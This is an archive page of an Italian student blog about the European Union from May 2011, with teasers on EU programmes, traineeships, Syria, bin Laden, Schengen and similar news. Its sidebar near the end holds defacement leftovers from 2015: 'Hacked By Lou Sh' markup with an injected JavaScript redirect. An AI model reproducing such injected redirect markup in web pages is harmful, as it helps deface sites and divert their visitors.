EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Maggio 2011
it

Quest'anno sono state molte le iniziative che l'Unione Europea ha attuato per cercare di offrire nuove occasioni e agevolazioni formative per i giovani studenti. Dopo il programma Recity, i programmi di Erasmus Mundus con i relativi master, e le borse di studio messe a disposizione per ognuna di queste attività arrivano i tirocini per traduttori.

Tutti coloro che sono in possesso di un diploma universitario possono provare a fare domanda per partecipare al tirocinio. L’Unione Europea ha messo a disposizione questa bella occasione per dare possibilità ai giovani di incrementare il proprio curriculum formativo e professionale. Inoltre (...)

it

Nell’ultimo decennio i sistemi educativi dei Paesi dell’Unione europea hanno registrato miglioramenti, ma hanno raggiunto soltanto uno dei cinque obiettivi fissati per il 2010, ovvero quello di aumentare il numero di laureati in matematica, scienze e tecnologia registrando un aumento del 37% rispetto al 2000.

Per quanto riguarda gli altri parametri, quali il tasso di dispersione scolastica, l’aumento del numero di allievi che completano l’istruzione secondaria superiore, il miglioramento della capacità di lettura e l’aumento del numero di adulti che partecipano ad attività d’istruzione o formazione, i (...)

it

Cari amici lettori, la redazione dell’ EurosBlog Tor Vergata è lieta di annunciarvi che da questa settimana potrete ascoltare le nostre notizie anche in radio. Finalmente, dalla collaborazione con Radio Tor Vergata (http://radio.torvergata.it) , la web radio della seconda Università di Roma, ha (...)

it

“Nella corsa alla ricchezza, agli onori e all'ascesa sociale, ognuno può correre con tutte le proprie forze per superare tutti gli altri concorrenti. Ma se si facesse strada a gomitate o spingesse per terra uno dei suoi avversari, l'indulgenza degli spettatori avrebbe termine del tutto.”

C’era una volta il liberalismo. C’era una volta un’Europa economica del “free trade”, e forse ci sarà ancora. Seppur è vero che la crisi economica mondiale ha fatto ripensare al ruolo del mercato nelle strutture economiche e nella vita delle persone, la consultazione avviata dalla Commissione Europea (...)

it

Quale mezzo migliore se non quello audiovisivo per sviluppare i valori culturali Europei?

Il progetto ha preso il via il primo gennaio 2007 e terminerà il trentuno dicembre 2013. Scopo primario del programma è quello di rafforzare economicamente il settore audiovisivo Europeo per consentirgli di svolgere al meglio il ruolo di ’’Veicolo di trasmissione dei valori culturali Europei ’’. (...)

it

“Questo è un bel giorno per l’America. Il nostro paese ha mantenuto il proprio impegno di veder fatta giustizia. Il mondo è più sicuro, è un posto migliore dopo la morte di Osama bin Laden”

1 maggio 1945. 1 maggio 2011. La storia sembra ripetersi, o forse, piuttosto, immobilizzarsi. La morte “ ufficiale” di Osama bin Laden, nemico pubblico dell’America in lotta contro il terrorismo, sembra avvenire alla luce di un paradosso storico: lo stesso giorno, di sessantasei anni, fa (...)

it

Il futuro dell’Europa risiede nell’unità politica e nell’integrazione economica. E’ anche sulla base di questi requisiti che da svariati anni, ormai, l’UE ha creato dei Corsi di formazione presso i Centri Giovanili Europei nel settore del lavoro giovanile internazionale. Questi Corsi sono organizzati dalla Direzione per la Gioventù e lo Sport del Consiglio d’Europa e hanno l’obiettivo di promuovere la partecipazione giovanile a livello europeo e migliorare le attività giovanili tese ad una collaborazione interculturale. I corsi garantiscono la preparazione di figure atte alla collaborazione dei giovani nelle attività all’interno dell’UE e gestiscono molti ambiti, tra cui la cooperazione internazionale giovanile, la formazione giovanile, la partecipazione giovanile e la cittadinanza democratica.

I Centri Giovanili Europei (EYC) hanno sedi principali a Strasburgo e Budapest e implementano un programma annuale di sessioni di studio ed altre attività in collaborazione con partner giovanili governativi e non governativi. Ogni sessione di studio riflette i principi base dell’organizzazione, (...)

it

L'Enpa ha dichiarato che in occasione delle feste, ogni anno vengono sacrificati oltre 2 milioni di agnelli. Secondo l'associazione animalista, per porre fine a questa strage sarebbe sufficiente sensibilizzare i consumatori ed orientarne i gusti alimentari verso menù vegetariani, cruelty free. Anche l'intervento della Lav non si è fatto aspettare, l'associazione ha proposto per le feste piatti privi di ingredienti di origine animale.

Più di 6 milioni di animali vengono macellati ogni anno per finire sulle tavole degli italiani, con un’impennata durante le festività pasquali e natalizie; nel 2010 sono stati 700 mila gli ovini e caprini macellati per le tavole pasquali. In anticipo sulla Pasqua, l’enpa ha rafforzato le (...)

it

Quest’anno il 25 aprile ha visto celebrare nello stesso giorno due feste. La ricorrenza della liberazione nazista e la festosa pasquetta. Pochissimi forse sapevano, però, che anche una terza giornata è stata celebrata nello stesso giorno. Una giornata meno gioiosa delle altre due, una giornata sicuramente molto più impegnativa, una giornata che ci fa riflettere; ma cosa ben più importante, una giornata il cui spirito non si affievolisce insieme al tramontare del sole, ma si tratta di una lotta continua, che va avanti ogni giorno. Insieme alla festa della liberazione per tutti i cittadini italiani, e alla festa del lunedì di Pasqua per tutti i credenti cristiani, è stata celebrata la “Giornata Mondiale contro la Malaria”.

Certe malattie sembrano lontani ormai decenni. Si è convinti che non esistano più, oppure che la medicina abbia trovato la giusta cura, e sembrano non fare più paura. Non è cosi, moltissime malattie ne fanno ancora molta, seminando morte nei Paesi sottosviluppati maggiormente. Tra queste, la (...)

it

La notizia che si sta diffondendo da qualche mese segnala che ci sono più di duecento mila contagi l'anno di malattie infettive, soprattutto da morbillo. Si vanno intensificando così le vaccinazione per prevenire il contagio.

Nell’ultimo anno si è visto crescere sempre più in maniera considerevole il contagio da morbillo, ciò è stato dimostrato dall’organizzazione mondiale della sanità che ha registrato circa 6.500 casi nel 2011, in Europa. Circa l’85% delle morti annuali è causato da malattie infettive. I centri (...)

it

Creato nel 1995, il programma di cooperazione nell’istruzione superiore, la formazione e la gioventù, ha come obiettivo di avvicinare gli studenti dell’UE a quelli canadesi tramite progetti accademici comuni nell’istruzione superiore e nella formazione professionale. La base di partenza per gli istituti d’istruzione superiore che volessero beneficiare di una tale sovvenzione è costituita dall’appartenere a uno dei 27 paesi dell’UE e dalla presentazione di un valido progetto.

Il Canada non sarà più così lontano. O almeno non lo sarà per gli studenti degli istituti che riusciranno ad avvalersi del programma di cooperazione nell’istruzione superiore o di formazione tra UE e Canada. Per partecipare al suddetto programma, ogni progetto deve avere un istituto capofila (...)

it

L'Unione Europea si fa portavoce di una nuova iniziativa che ha non solo lo scopo di ridurre l'inquinamento ambientale ma anche quello di favorire l'utilizzo di fonti rinnovabili da cui ricavare energia.

L’Unione Europea dal primo al quindici maggio attuerà una campagna informativa ’’European Solar Days’’, cui scopo centrale è quello di dare quante più informazioni possibili sull’utilizzo delle fonti di energia rinnovabili. Principalmente si potranno avere chiarimenti e spiegazioni sugli impianti (...)

it

Da Bruxelles l’Unione Europea fa sapere di voler congelare il negoziato sull'accordo di associazione con la Siria e di adottare l’embargo sulla fornitura di armi e attrezzature, che potrebbero essere di nuovo usate in simili circostanze. Sulla stessa linea gli Stati Uniti, che varano sanzioni economiche contro Assad e famiglia, e l’ONU, che si batte anche per il rilascio dei prigionieri politici.

Dopo Tunisia, Egitto e Libia i venti infuocati si spostano sulla Siria. Le rivolte popolari scoppiate in Medio Oriente lo scorso marzo sono arrivate anche a Damasco, espandendosi a macchia d’olio nelle altre città siriane, soprattutto nella zona centro meridionale. La folla è scesa in piazza per (...)

it

A Firenze l’onore di accogliere il primo festival d’Europa. Tutta la città, per 5 giorni sarà scenario di grandi eventi. Mostre, rappresentazioni, workshop, convegni, che ci accompagneranno a conoscere meglio la nostra Europa.

Si apre il 6 Maggio, e continuerà per i cinque giorni successivi, fino al 10, il primo festival d’Europa, che si terrà a Firenze. L’evento nasce da un’idea dell’Istituto Universitario Europeo, istituto nato nel 1976 da pochi stati e arrivato oggi a 20 Stati membri finanziatori, con sede alla Badia (...)

it

“Non c'è vocabolo di cui non si sia oggi fatto così largo abuso come di questa parola: libertà. Non mi fido di questo vocabolo, per la ragione che nessuno vuole la libertà per tutti; ciascuno la vuole per sé”. Le preoccupazioni di Otto von Bismarck di quasi due secoli fa, oggi più che mai sembrano tornare d’attualità. La giornata dedicata alla libertà di stampa è stata un’occasione per tracciare un bilancio della situazione di oggi.

“World Press Freedom Day”: per ricordare la Dichiarazione del 3 maggio 1991 di Windhoek, realizzata per la promozione e la tutela dei media indipendenti nei paesi africani. Vent’anni, un lasso di tempo in cui molte cose sono cambiate, ma fra queste non sembra rientrare l’agonizzante libertà di (...)

it

Scarica il file audio in mp3 dell'€urogiornale all'indirizzo: http://radio.torvergata.it/multimed...

Osama bin Laden è morto Dopo aver sparso il terrore in Occidente, il leader del movimento terroristico islamico di Al Qaeda, è stato ucciso in un blitz delle forze armate statunitensi durante un’ operazione militare in Pakistan, presso Abbotabad. A darne la notizia è stato il Presidente degli Stati (...)

it

Nel luglio 2009 la legge che istituisce il reato di clandestinità è approvata dal Parlamento italiano. L’Unione chiede subito chiarimenti, in quanto la legge è in contrasto in molti punti “con la direttiva 2008CE/115 sui rimpatri di extracomunitari in caso di soggiorno irregolare”.

Il punto di contrasto della legge italiana con la direttiva europea, è la reclusione con cui l’Italia punisce "il cittadino di un paese terzo in soggiorno irregolare che non si sia conformato a un ordine di lasciare il territorio nazionale, dopo che gli sia stato notificato un ordine di lasciare (...)

11
05
2011

Erbe medicinali

it

L'Unione Europea con questa nuova direttiva entrata in vigore il primo maggio, cerca di regolare la circolazione e l'utilizzo di queste erbe per prevenire il rischio di una qualsiasi complicazione.

L’uomo ormai da tempo, forse millenni, ha trovato nelle piante il principale strumento e alleato per la cura del corpo e dello spirito. Nel passato i medici usavano fiori, foglie, radici, qualsiasi parte della pianta per cercare di produrre cure efficaci per l’uomo o semplicemente tisane. Oggi l’ (...)

it

La ricerca di un posto di lavoro di prestigio si avvicina alla fine per i 40 giovani che avranno la possibilità di usufruire di questo programma di tirocini organizzato dal quartier generale della NATO. Gli interessati però devono affrettarsi, la possibilità di inviare la propria candidatura scade il 20 maggio 2011 ed è da inviare online agli uffici della NATO a Bruxelles.

Parte per la nona volta l’ormai consueto programma di tirocini negli uffici della NATO di Bruxelles volto ai giovani laureandi e neo laureati appartenenti ai paesi della NATO che volessero lavorare con l’organizzazione internazionale. Il programma prevede il raggiungimento di quattro obiettivi (...)

it

Per costruire un ottimistico futuro digitale le basi devono essere gettate nel presente. Questo è stato l’impulso di Bruxelles, deciso ad innovare Internet entro il 2020.

Si chiama FI-PPP, Future Internet Public Private Partnership, il progetto di investimento per l’Internet del futuro avanzato dalla Commissione Europea. Il partenariato pubblico-privato siglato tra Bruxelles e 152 organizzazioni è stato ideato per modernizzare e potenziare Internet in merito (...)

it

L’edizione 2011 della Festa dell'Europa ha proposto numerose occasioni di riflessione e dibattito sui temi più scottanti ed attuali dell’Unione: cultura, sicurezza alimentare, biodiversità, innovazione, integrazione, pace, solidarietà, giovani, sostenibilità e ambiente.

Anche quest’anno l’importante evento è stato promosso numerose istituzioni regionali ed europee: il Comune di Parma, la Provincia di Parma, l’Europass, l’Autorità europea per la sicurezza alimentare, la Rappresentanza a Milano della Commissione Europea e l’Università degli Studi di Parma. Hanno (...)

it

La V edizione del progetto “Settimana Europea dei Giovani”, è alle porte. Domenica 15 maggio, e per tutta la settimana successiva, tutta l’Europa prenderà parte, in un modo o nell’altro al programma. Protagonisti in assoluto, i giovani.

La prima edizione fu nel 2003, per replicare nel 2005, e poi nel 2007 e l’anno dopo ancora, il 2008. Negli anni, il progetto sembra aver ottenuto molti consensi, e trovato nuovi sostenitori, cosicché sta per partire la quinta edizione. Domenica 15 maggio il fischio d’inizio. Una” partita” che (...)

it

Fa discutere il decreto sviluppo annunciato nei giorni scorsi nel Parlamento Italiano che prevede il passaggio delle spiagge ai privati per una durata novantennale.

Il Consiglio dei ministri ha approvato il decreto di concessione delle spiagge alle imprese private per una durata di novant’anni. Tale legge che introduce il diritto di superficie su coste e litorali per durata novantennale avverrà nel rispetto delle norme e in tutela dell’ambiente, mirando (...)

it

Il prossimo Lunedì 16 maggio presso la Facoltà di Lettere e Filosofia dell’Università di Roma Tor Vergata si svolgerà la presentazione del libro “Notizie da Bruxelles. Logiche e problemi della costruzione giornalistica dell’Unione europea”. Interverrà l’autore, il sociologo Alessio Cornia, Dottore di (...)

it

Siamo di fronte "ad uno stato insoddisfacente dell'Unione Europea come soggetto di politica internazionale”. E riferendosi in particolare alla crisi libica: “Rispetto a questi eventi l'Unione Europea non è riuscita ad esprimere una posizione comune, (…) che fosse appunto il segno di quella politica estera e di sicurezza comune che è un nostro irrinunciabile traguardo".

Il presidente della Repubblica usa parole molto franche nei confronti dell’operato dell’Unione: "Se non c’è preparazione, elaborazione costante e analisi di fronte a crisi improvvise, è difficile che l’Unione europea si trovi pronta con risposte condivise." Le soluzioni a vista di una assenza di (...)

it

Scricate le puntata del 16 maggio dal banner presente sul nostro sito oppure collegandovi al indirizzo: http://radio.torvergata.it/multimed...

Napolitano critica l’Unione Europea. Il presidente della Repubblica ha espresso una critica sull’Unione Europea, giudicandola insufficiente in politica internazionale. Il riferimento sarebbe alle risposte date dall’Unione in merito alle crisi del Mediterraneo e all’emergenza immigrazione. L’Alto (...)

it

Unità. Consultando il Dizionario la definizione è più o meno così: concordia di intenti, solidarietà, convergenza tra soggetti diversi o in una realtà composita. E’ proprio su questa base che si è svolto a Firenze il Festival d’Europa tra il 6 e il 10 maggio 2011. Evento nato dagli organi dell’Istituto Universitario Europeo, ha trovato la collaborazione della Commissione Europea, del Parlamento Europeo e del Ministero Italiano per gli Affari Europei, con il Ministro degli Affari Esteri Franco Frattini e il sindaco di Firenze, Matteo Renzi. Altre importanti istituzioni hanno collaborato al clima di unione che si voleva celebrare allo scopo di far nascere e crescere nei cittadini Italiani e non una coscienza Politica mirata all’incremento del sentimento Europeo. Esclusivamente per questa occasione, Firenze si è vestita di blu, il colore della bandiera dell’UE.

Sicuramente l’evento più importante ed imponente è stato la Conferenza Internazionale “The State of the Union” presso il Salone dei Cinquecento in Palazzo Vecchio, promossa dall’IUE (Istituto Universitario Europeo) il 9 maggio. La conferenza ha visto la partecipazione di Jerzy Buzek, Presidente del (...)

it

In occasione dell’uscita del volume Italy and the European Union della Prof.ssa Federiga Bindi il Centro di Eccellenza Jean Monnet in collaborazione con la Scuola Superiore di Pubblica Amministrazione organizza un incontro dibattito sullo stato delle relazioni tra il nostro paese e l’Unione (...)

it

La decisione di Copenaghen di ripristinare i controlli doganali si è rivelata una vera e propria pugnalata all’Europa nata da Schengen. Uno dei paesi più ricchi del continente, con un’azione guidata da una xenofobia travestita da legittima difesa, sta mettendo a dura prova il trattato sulla libera circolazione, bandiera della nuova Europa.

Sono due i fattori che inducono ad una preoccupante riflessione: le ondate sempre più frequenti di immigrazione e il dilagare dell’estrema destra come un fiume in piena. La loro somma ha avuto come risultato la decisione del governo danese di rafforzare i controlli alle frontiere marittima con la (...)

19
05
2011

Il fattore K

it

“Il capo supremo deve essere giusto per se stesso e tuttavia essere un uomo. Da un legno storto come’è quello di cui l’uomo è fatto non può uscire nulla di interamente diritto”

Dopo la caduta dei regimi comunisti, il fattore “K” sembrava essere scomparso dalla politica internazionale. Il 15 maggio 2011, invece, è ritornato a far parlare di se sotto un’altra veste: il direttore operativo del Fondo Monetario Internazionale (FMI – organizzazione internazionale nata nel 1946 (...)

it

"Fare della differenza linguistica un punto di forza" ecco con quale spirito nasce il riconoscimento Label organizzato dalla Commissione dell'Unione Europea e ormai giunto alla sua quattordicesima edizione.

Sono ormai lontani gli anni in cui uno dei principali obiettivi dei singoli stati era quello di proteggere e tutelare la propria lingua, in cui si credeva che un idioma potesse essere migliore di un altro. Oggi la situazione si è decisamente evoluta: basta pensare che uno dei principali (...)

it

L'Unione Europea ha elaborato un concorso per risparmiare sia denaro che consumi energetici riducendo inoltre l'impatto ambientale.

L’utilizzo delle energie rinnovabili non solo comporta il risparmio sui costi in bolletta ma agevola anche il risparmio energetico. Così lo scorso 13 Aprile ha preso il via un concorso promosso dalla Commissione Europea, rivolto a tutti i paesi dell’Unione, due mila Euro e un viaggio soggiorno a (...)

21
05
2011

Eur@dionantes

it

Sulla frequenza 101.3 di Nantes è possibile ascoltare eur@dio Nantes la radio rivolta soprattutto ai giovani e finanziata dall’Unione Europea. Il progetto di questa radio nasce nel 2005 quando la giornalista francese Laurence Aubron che gia collaborava con molti studenti stranieri si rende conto (...)

it

Articolo 9 Costituzione della Repubblica Italiana: “La repubblica promuove lo sviluppo della cultura e la ricerca scientifica e tecnica. Tutela il paesaggio e il patrimonio storico e artistico della Nazione”.

La nostra Costituzione è una delle poche al mondo che si impegna nella salvaguardia del patrimonio culturale del paese, anche attraverso l’emanazione di sentenze della Corte Costituzionale (151/1986) che sanciscono la “primarietà del valore estetico - culturale (…) capace di influire profondamente (...)

it

L’idea è nata nel 2009, quando per la prima volta fu assegnato alla città di Rotterdam il titolo di “Capitale Europea della Gioventù”. Da quel momento, ogni anno viene eletta una città, e per un anno, questa ha il compito e l’onore di accogliere questo progetto, mettendo al centro di tutte le sue facoltà, i giovani e il loro futuro.

Viene proclamata “Capitale Europea della gioventù”, per l’anno 2011, Anversa. La città belga ha ricevuto, dal Forum Europeo della Gioventù, il riconoscimento tanto ambito da ogni città Europea. I festeggiamenti sono iniziati tra il 4 e 5 marzo, il Kick-Off Event Club-Centraal, quando nella stazione, (...)

it

La Corte di Giustizia, chiamata a decidere dopo il deferimento da parte della Commissione, ha reso noti nuovi capi d’accusa: nelle relazioni degli anni dal 2005 al 2007 si registra un continuo superamento dei valori limite da inquinamento da PM10, ben oltre la tolleranza consentita.

Il problema smog colpisce ancora il Belpaese. Come era prevedibile, l’Italia non è riuscita ad evitare il deferimento alla Corte di Giustizia da parte della Commissione Europea, e ora attende il verdetto che con tutta probabilità comporterà una pesante sanzione economica per la mancata applicazione (...)

it

Continuate a seguirci ogni settimana per le news dal continente, con il nostro Euro giornale e sul nostro sito http://torvergata.eurosblog.eu/.

Notizie: Dominique Strauss-Kahn, leader del Fondo Monetario internazionale, è stato arrestato a New York domenica 16 maggio. L’accusa è quella di tentato stupro contro una giovane cameriera dell’hotel in cui soggiornava. Le ripercussioni sul sistema finanziario mondiale sono state immediate, in (...)

it

''Le coppie gay non devono essere discriminate sulle pensioni e devono avere gli stessi diritti delle coppie etero'', questo è quanto ha dichiarato l'Unione Europea.

Secondo la Corte di Giustizia Europea l’uomo omosessuale che ha versato contributi come un uomo etero deve poter avere gli stessi benefici di quest’ultimo in termini legislativi. Questa è la notizia diffusa dall’Ue e deve essere applicata in tutti gli Stati membri. La sentenza dell’UE è del dieci (...)

25
05
2011

In vita veritas

it

“A questo cimitero di vittime della crudeltà umana nel nostro secolo si aggiunge ancora un altro grande cimitero: il cimitero dei non nati, cimitero degli indifesi, di cui perfino la propria madre non conobbe il volto, acconsentendo, oppure cedendo alla pressione, perché venisse loro tolta la vita ancora prima di nascere”.

La pillola del giorno dopo, o meglio, la pillola della settimana dopo è ufficialmente entrata in commercio in Europa. Grazie all’approvazione data dall’Emea, l’ente europeo per il controllo dei farmaci, l’EllaOne, questo è il nome della pillola, dovrebbe essere reperibile nelle farmacie e strutture (...)

it

Un grande obiettivo è stato raggiunto dalla Lav e le numerose associazioni animaliste unite nel Fur Free Alliance, che in questi mesi hanno proposto e sostenuto specifici emendamenti in tema di etichettatura di prodotti tessili: il nuovo Regolamento comunitario per la “Denominazione dei prodotti tessili e relativa etichettatura” sancisce per tutti i capi di abbigliamento l'obbligo di riportare in etichetta l’eventuale presenza di parti animali.

Il nuovo regolamento comunitario non mira soltanto a migliorare ed espandere la tutela del mondo animale, ma anche a tutelare i consumatori italiani ed europei, attualmente non in grado di riconoscere i prodotti tessili “non bagnati di sangue” da quelli confezionati con pelliccia animale. Tutti (...)

it

Alla domanda “ritieni che l’istruzione universitaria sia un’opzione attraente per il tuo paese?”, quasi il 40% degli intervistati, tra i 15 e i 35 anni, ha risposto di no. Il dato è ancor più preoccupante se confrontato con la percentuale del resto d’Europa (20%), ma soprattutto con i paesi del nord (7%), in cui quel “pezzo di carta” conta ancora molto.

Forse per una questione di priorità l’emergenza dell’occupazione giovanile è spesso trascurata o sottovalutata dalla politica. Inconsciamente siamo stati portati ad accettare che il nostro non sia un paese per giovani, ma soprattutto che la laurea come trampolino di lancio verso il mondo del lavoro (...)

2
it

Si dovrà attendere il 2013 per l'abrogazione del divieto che era stato stilato dall'Unione per assicurare la sicurezza aerea.

L’Unione Europea ha ribadito la sua intenzione di mantenere in vigore almeno fino al 2013 il divieto che prevede di trasportare liquidi in aereo. Quando e perchè è stata proposta questa direttiva? Era il 2006 quando fu scoperto un complotto terroristico sugli aerei in partenza da Londra e (...)

it

Scopriamo in cosa consiste il progetto e conosciamo velocemente i giovani delegati che rappresentano il nostro Paese. Nelle prossime pubblicazioni avremo la possibilità di entrare più nei dettagli e capire cosa è successo e cosa è stato deciso durante le negoziazioni.

Cari lettori, ci presentiamo. Siamo Alberta Pelino, Cinzia Bianco, Marta Castellani, Erika Guerra, Francesca La Rosa, Edoardo Morgante, Nicola Speranza e Francesco Tacconi. Siamo i giovani delegati scelti tra gli studenti di tutta Italia per rappresentare la nostra nazione nei prossimi Summit (...)

it

Il capo della diplomazia Ue Catherine Ashton ha dichiarato davanti al Parlamento europeo che l'ufficio garantirà il sostegno del vecchio continente alla società civile e al consiglio nazionale di transizione. Si tratta, questo, di un ulteriore sostegno al Consiglio nazionale da parte dell’Europa, che intende contribuire alla “costruzione di una piena democrazia” in Libia.

La responsabile della diplomazia europea Catherine Ashton ha incontrato a Bengasi i capi dei ribelli per l’inaugurazione della rappresentanza europea, confermando la linea continuativa di collaborazione alla lotta contro il regime, personificata in questo caso dal presidente del Consiglio (...)

it

Scaricate le puntata del 30 maggio dal banner presente sul nostro sito oppure collegandovi all' indirizzo: http://radio.torvergata.it/multimed...

Bentornati ad una nuova puntata dell’Euro giornale, in diretta per voi dall’Europa come ogni settimana. Per voi le ultime notizie dal continente: EllaOne, la pillola contraccettiva del quinto giorno è stata dichiarata commerciabile dall’Emea, l’ente europeo per il controllo dei farmaci. Le agenzie (...)

it

Dopo la pubblicazione a marzo 2010 del libro verde, la Commissione Europea ha redatto e presentato anche il libro bianco relativo alla protezione delle foreste.

Il libro bianco è un documento ufficiale interamente redatto dalla Commissione Europea nel quale vengono registrate le proposte, le decisioni, le possibili nuove linee d’azione relative ad un particolare settore dell’economia. Solitamente il libro bianco viene realizzato dopo l’apertura di un (...)

31
05
2011

Il sole e le stelle

it

“Dicono che il Giappone sia nato da una spada. Dicono che gli antichi dei hanno immerso una lama di corallo nell'oceano e che, al momento di estrarla, quattro gocce perfette siano cadute in mare e che quelle gocce siano diventate le isole del Giappone. Io dico che il Giappone è stato creato da una manciata di uomini, guerrieri disposti a dare la vita per quella che sembrò ormai una parola dimenticata: onore”.

Sembrava impossibile ai più scettici, ma vedere le stelle con la luce solare è da oggi realtà. La partnership tra il “sole” del Giappone e le “stelle” dell’Unione Europea, istituita nel 1991, oggi è arrivata alla sua ventesima edizione. I rapporti bilaterali erano cominciati in realtà già negli anni (...)

it

Mobilitare risorse e consensi in tutto il mondo è compito dell’UNICEF, Fondo delle Nazioni Unite per l’Infanzia, che ogni anno dal 1946 si impegna, in 157 paesi del mondo, a dare un contributo significativo ai bisogni di base e di vita dei bambini, ragazzi e adolescenti. L’Unicef si prefigge l’obiettivo di creare programmi e progetti di sviluppo umano in collaborazione con le istituzioni pubbliche e con le associazioni locali, soprattutto per eliminare le diversità culturali e andare a vantaggio dei più poveri, di coloro che subiscono discriminazioni legate alla razza, al sesso, alla religione e alla condizione sociale

Proprio con lo scopo di eliminare qualsiasi discriminazione nasce, nel 2002, the one minutes foundation, un video network planetario in collaborazione con l’Unicef, che ha istituito il concorso “theoneminutesJr”. L’accesso al concorso è consentito solo ai giovani tra i 12 e i 20 anni provenienti da (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France